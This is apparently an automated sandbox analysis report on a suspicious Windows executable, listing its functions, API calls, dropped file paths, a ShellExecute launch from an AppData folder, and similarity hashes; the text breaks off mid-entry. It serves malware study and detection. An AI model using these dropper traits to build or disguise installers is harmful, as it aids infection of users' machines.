Instruction Fuzzy Hash: 5F112531908150AFDB112F755D44E6F37B0EA62366768473BF891B22E2D23C0D42D62E

Function 0040587D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405891
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004058AB

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405880, 00405884
"C:\Users\user\Desktop\xLDz0WPZYc.exe", xrefs: 0040587D
nsa, xrefs: 00405888

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\xLDz0WPZYc.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1267697555
Opcode ID: 53651faf07563a77c89e4d9d04216bb1832e7739a800dcda734853e57c4c3aa5
Instruction ID: 97602d992a1fc3ea541738fe691a17a98ed12bbd3b61733a4c4fd0f0c3479bd5
Opcode Fuzzy Hash: 53651faf07563a77c89e4d9d04216bb1832e7739a800dcda734853e57c4c3aa5
Instruction Fuzzy Hash: B0F05E367482086AEB109A55DC44B9B7B98DB91750F14C02AFD44AA190D6B099548B99

Function 100016BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE

GlobalFree.KERNEL32(00000000), ref: 10001768
FreeLibrary.KERNEL32(?), ref: 100017DF
GlobalFree.KERNEL32(00000000), ref: 10001804

Part of subcall function 100021B0: GlobalAlloc.KERNEL32(?,7D8BEC45), ref: 100021E2

Part of subcall function 1000258D: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FF

Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572

Strings

, xrefs: 100017E5

Memory Dump Source

Source File: 00000000.00000002.1880481343.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1880446902.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880503056.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880544481.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_xLDz0WPZYc.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 5c34708dbc5c14fa42f4b7439be41c1509afaedaf37bf6653e8bb29f9fa28a01
Instruction ID: 946e86dc2be410c0748ecba0c1d48508df540d87c222276c6f0f58241c559a10
Opcode Fuzzy Hash: 5c34708dbc5c14fa42f4b7439be41c1509afaedaf37bf6653e8bb29f9fa28a01
Instruction Fuzzy Hash: C5318B79408205DAFB41DF649CC5BCA37ECFB042D5F018465FA0A9A09ADF78A8458A60

Function 004024D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
WriteFile.KERNELBASE(00000000,?,C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E

Strings

C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll, xrefs: 004024DD, 00402502

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll
API String ID: 427699356-4076648629
Opcode ID: 73dde7284d951aafa493d15edd55bc1c51bad9a2407fd8823c25f1a3ec9d0b34
Instruction ID: 4e81b00b1a0a83b1a618d6832a3b29c213d1c25728c37480281a976930c2fc19
Opcode Fuzzy Hash: 73dde7284d951aafa493d15edd55bc1c51bad9a2407fd8823c25f1a3ec9d0b34
Instruction Fuzzy Hash: DEF089B2A14144BFDB40EBA49E49EAB7764DB40308F10443BB141F61C2D6FC5941DB7D

Function 00403082 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405E28: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\xLDz0WPZYc.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E80
Part of subcall function 00405E28: CharNextA.USER32(?,?,?,00000000), ref: 00405E8D
Part of subcall function 00405E28: CharNextA.USER32(?,"C:\Users\user\Desktop\xLDz0WPZYc.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405E92
Part of subcall function 00405E28: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040308E,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 00405EA2

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573410,00403268), ref: 004030A3

Strings

1033, xrefs: 004030AA
C:\Users\user\AppData\Local\Temp\, xrefs: 00403083, 00403088, 0040308E, 0040309A, 004030A2, 004030A9

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-3144792594
Opcode ID: 389a80ee12a651c87ccad1e400f0b61aee7e0e7ab3a8d76480836320ff4f5ec7
Instruction ID: fee6ec1a5ad4de73206782a352265a6ade63d615f6b53232b42a3ca9793d762f
Opcode Fuzzy Hash: 389a80ee12a651c87ccad1e400f0b61aee7e0e7ab3a8d76480836320ff4f5ec7
Instruction Fuzzy Hash: 2CD09222A4BE3062D55137663C0AFCF054C8F5631AB518077F908740C69A6D9A9249EE

Function 004065CC Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2395b39049a362c34a27dfb880213796ab4f3997f605305afcf4b88fff478a5b
Instruction ID: 17d8f0c9adc7b2b71efc7957c866aa3859f64222e8b37881b9213324db3bf9cd
Opcode Fuzzy Hash: 2395b39049a362c34a27dfb880213796ab4f3997f605305afcf4b88fff478a5b
Instruction Fuzzy Hash: E0A15171E00228CBDF28CFA8C8447ADBBB1FB44305F15806ED856BB281D7789A96DF44

Function 004067CD Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e99653bfb7f144ce5dad25bea39bf75b689d07406e35084d2878a8dabe37ac6e
Instruction ID: fc305786e35d93851c8f3c5d9b38f8a429e7909e60618e2c0103eac0a9dc1c25
Opcode Fuzzy Hash: e99653bfb7f144ce5dad25bea39bf75b689d07406e35084d2878a8dabe37ac6e
Instruction Fuzzy Hash: C1913071E00228CBDF28CF98C8547ADBBB1FB44305F15816AD856BB281D7789A96DF44

Function 004064E3 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe53a61097b749f1782159a8fc3ae1334c5d5d5e9ac5eec79330ddb7b6ec713b
Instruction ID: 045822fc5ab24079ba69da477224c4b1a41a130b0053ffb1807465ee2ef03bcb
Opcode Fuzzy Hash: fe53a61097b749f1782159a8fc3ae1334c5d5d5e9ac5eec79330ddb7b6ec713b
Instruction Fuzzy Hash: AB814771E00228CFDF24CFA8C8447ADBBB1FB45305F25816AD856BB281D7789A96DF44

Function 00405FE8 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f03dec724b3596635aeae071b0dd6c0542c79984eb544c4ce6f813bf1c132c47
Instruction ID: efdf2bc729d78145ecf5a565514c9258b5bbce2e4cf5113e346d1a35f2b936d2
Opcode Fuzzy Hash: f03dec724b3596635aeae071b0dd6c0542c79984eb544c4ce6f813bf1c132c47
Instruction Fuzzy Hash: AB817771E00228CBDF24DFA8C8447AEBBB0FB45305F15816AD856BB281D7785A96DF44

Function 00406436 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b228df2ed3587aaf6c6f9f97010ba9ba02a5f9c90de50599b2abf323e58cb698
Instruction ID: c983b8745f75bf2274a463a9cfcccf5039b1f1987fed19ece7001b5e7d797120
Opcode Fuzzy Hash: b228df2ed3587aaf6c6f9f97010ba9ba02a5f9c90de50599b2abf323e58cb698
Instruction Fuzzy Hash: 3F712371E00228CFDF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF54

Function 00406554 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f482201699af14bb3cd10cc7f775e8512ddaef9db8a966204fce1aae5b262981
Instruction ID: 3e902398f65232741f3d3f2c7f6467c21586f7f50b1ebc0ee674bbd924b4c7fc
Opcode Fuzzy Hash: f482201699af14bb3cd10cc7f775e8512ddaef9db8a966204fce1aae5b262981
Instruction Fuzzy Hash: FA714671E00228CFDF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF44

Function 004064A0 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a381668fc57e9f6ced01437e848a6b2accfb19374870d44d6b2c2291bed7b2e
Instruction ID: 9020e7499a55ede5867a2e11e25a0f248b5ba7faeda0d39cd9abe089b181c94d
Opcode Fuzzy Hash: 9a381668fc57e9f6ced01437e848a6b2accfb19374870d44d6b2c2291bed7b2e
Instruction Fuzzy Hash: C5715671E00229CFEF28CF98C8447ADBBB1FB44305F15806AD856BB281D7789A96DF44

Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404EA6: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000,?), ref: 00404EDF
Part of subcall function 00404EA6: lstrlenA.KERNEL32(00402F92,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000,?,?,?,?,?,?,?,?,?,00402F92,00000000), ref: 00404EEF
Part of subcall function 00404EA6: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00402F92,00402F92,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,00000000,0040E888,00000000), ref: 00404F02
Part of subcall function 00404EA6: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh73EF.tmp\System.dll), ref: 00404F14
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F3A
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F54
Part of subcall function 00404EA6: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F62

Part of subcall function 0040536C: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004214E0,Error launching installer), ref: 00405395
Part of subcall function 0040536C: CloseHandle.KERNEL32(?), ref: 004053A2

WaitForSingleObject.KERNEL32(?,?,00000000,000000EB,00000000), ref: 00401E6C
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
CloseHandle.KERNELBASE(?,00000000,000000EB,00000000), ref: 00401EA1

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: c91ed9de4a6757527867ef949f32f8f167b50b71a157a29d78972e3069497e2b
Instruction ID: 002f7fb6c641edc4c9e1c43034261a5554d3377b2f1f1ae98a311fa9132adf51
Opcode Fuzzy Hash: c91ed9de4a6757527867ef949f32f8f167b50b71a157a29d78972e3069497e2b
Instruction Fuzzy Hash: 21016D71904114FBCF20AFA1DD859AE7B71EB40344F14847BFA01B51E0C37C5A81DBAA

Function 00405AA4 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000002,00405CE9,00000000,00000002,?,00000002,?,?,00405CE9,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405ACD
RegQueryValueExA.KERNELBASE(?,?,00000000,00405CE9,?,00405CE9), ref: 00405AEE
RegCloseKey.ADVAPI32(?), ref: 00405B0F

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction ID: bd87ec550333214892aadd2865629ce231d6a2c68cbcf8666acf0199ad1a476e
Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
Instruction Fuzzy Hash: 6A01487114020AEFDB22CF64ED44AEB3FACEF14354F004026F905A6260D235E964CBA5

Function 00405435 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405829: GetFileAttributesA.KERNELBASE(?,?,00405441,?,?,00000000,00405624,?,?,?,?), ref: 0040582E
Part of subcall function 00405829: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405842

RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405624), ref: 00405450
DeleteFileA.KERNELBASE(?,?,?,00000000,00405624), ref: 00405458
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405470

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: 8fd00ee6eb4cd0b56e1a0eaf7a51cd4f8a8540850b850c2f3b8b5694c02e0256
Instruction ID: 26783d4835885a93a59b83a2bd4b1d6eec4eb66ae6ada20176159b7b217e38af
Opcode Fuzzy Hash: 8fd00ee6eb4cd0b56e1a0eaf7a51cd4f8a8540850b850c2f3b8b5694c02e0256
Instruction Fuzzy Hash: 32E0E532908A9056C2106734AD08BDB2AD9EF86316F05893AF891B11C0C73848868ABB

Function 00401DD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Studerekammermenneskes,?), ref: 00401E1E

Strings

C:\Users\user\AppData\Roaming\Studerekammermenneskes, xrefs: 00401E09

Memory Dump Source

Source File: 00000000.00000002.1872800226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1872778734.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873035936.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873387281.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1873886692.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_xLDz0WPZYc.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Roaming\Studerekammermenneskes
API String ID: 587946157-3606720462
Opcode ID: 70ca6f181be23fb06d3f60a7a9d57aec4edbef75b7d1a65808c4265d3677d314
Instruction ID: 1a827242e624075fd0b822132d7078b468ceca4fa9ad7d7ba61b9346c8edfaa6
Opcode Fuzzy Hash: 70ca6f181be23fb06d3f60a7a9d57aec4edbef75b7d1a65808c4265d3677d314
Instruction Fuzzy Hash: B4F0F6B3B041047ADB41ABB59E4AE5D2BA4EB41718F240A3BF400F71C2DAFC8841F728

Function 100027EC Relevance: 3.2, APIs: 2, Instructions: 156COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000), ref: 100028AB
GetLastError.KERNEL32 ref: 100029B2

Memory Dump Source

Source File: 00000000.00000002.1880481343.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1880446902.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880503056.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1880544481.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_xLDz0WPZYc.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 10da2a693ced731503c2d5b3de2f7fe8e431c949d2a6016fe146597bbe82a282
Instruction ID: 2b4501ff186f60f2b29b8b71d76009b37135a14f8b8ad132536a4a21bb517402
